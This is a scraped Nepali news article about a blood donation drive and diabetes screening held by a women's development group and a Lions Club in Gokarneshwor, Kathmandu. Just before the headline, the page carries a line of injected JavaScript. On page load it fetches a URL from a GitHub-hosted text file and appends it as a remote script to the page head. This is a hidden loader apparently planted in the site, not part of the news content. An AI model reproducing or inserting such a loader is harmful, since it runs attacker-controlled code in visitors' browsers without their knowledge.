;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); मितेरी टोल महिला विकास समूह र लाइन्स कल्ब काठमाडौंद्वरा रक्तादान {फोटोसहित} – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • मितेरी टोल महिला विकास समूह र लाइन्स कल्ब काठमाडौंद्वरा रक्तादान {फोटोसहित}
गोकर्नेश्वोर बिशेष

मितेरी टोल महिला विकास समूह र लाइन्स कल्ब काठमाडौंद्वरा रक्तादान {फोटोसहित}

कात्तिक २७,

काठमाडौं । काठमाडौंको गोकर्णेश्वार नगरपालिकामा मितेरी टोल महिला विकास समुह र लाइन्स कल्व काठमाडौं जर्नीले  रक्तदान कार्यक्रम गरेको छ ।

बिहिबार  नगरपालिकाको वडा नं ४ भगवती थानमा नगरपालिकाको आर्थिक सहयोगमा रक्तदान कार्यक्रम गरेको मितेरी टोल महिला विकास समुहकी अध्यक्ष एवं लाइन्स कल्ब काठमाडौंकी कोषा-अध्यक्ष प्रमिला शेर्पाले जुनेली न्युजलाई जानकारी दिईन् । उनका अनुसार ३७ जनाले रक्तदान गरेका छन् । त्यस्तै  २ सय १५ जनाले मधुमेह परीक्षण गरेका छन् ।

कोरोना भाइरस संक्रमणका कारण उपचारमा रगतका कारण समस्या भएकहरुको लागि रगत अभाव नहोस् भन्ने उदेश्यले रक्तदान गरिएको हो ।

फोटोहेर्नुहोस्

फेसबुक प्रतिक्रियाहरु